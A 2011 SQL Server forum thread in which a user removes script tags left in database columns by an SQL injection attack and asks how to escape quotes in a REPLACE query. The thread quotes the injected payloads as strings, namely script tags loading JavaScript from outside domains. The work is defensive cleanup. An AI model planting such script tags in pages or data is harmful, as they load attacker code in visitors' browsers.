Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
| Author |
Topic |
|
stegothdump
Starting Member
9 Posts |
 Posted - 2011-10-09 : 15:26:32
|
| Hi There,I have a SQL DB that needs cleansed of the recent SQL injection attack.I have written the following code:UPDATE [tableName]SET columnName = REPLACE(CAST(columnName AS VARCHAR(8000)), '"></title><script src="http://1.verynx.cn/w.js"></script><!--', '')WHERE columnName LIKE '%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'The problem is that <script src='http://visionaryliongroup.com.au/images/counter.php'></script> text includes a single apostrophe rather than the double quote as shown in the example above. how can i get round this? |
|
|
tkizer
Almighty SQL Goddess
38200 Posts |
|
|
stegothdump
Starting Member
9 Posts |
Posted - 2011-10-10 : 03:14:42
|
| so would that be two single quotes round the stuff i want to take out i.eUPDATE Table1SET Col1 = REPLACE(Col1, '<script src='http://www0.douhunqn.cn/csrss/w.js'></script>', '')would becomeUPDATE Table1SET Col1 = REPLACE(Col1, ''<script src='http://www0.douhunqn.cn/csrss/w.js'></script>'', '') |
 |
|
|
madhivanan
Premature Yak Congratulator
22864 Posts |
|
|
paultech
Yak Posting Veteran
79 Posts |
Posted - 2011-10-23 : 14:27:21
|
| Hello ,May be you can use parameters instead of direct sql query ,by using parameters and parse to query ,it should prevented from sql injectionpaul Tech |
|
|
|
|
|
|
remove SQL injected script files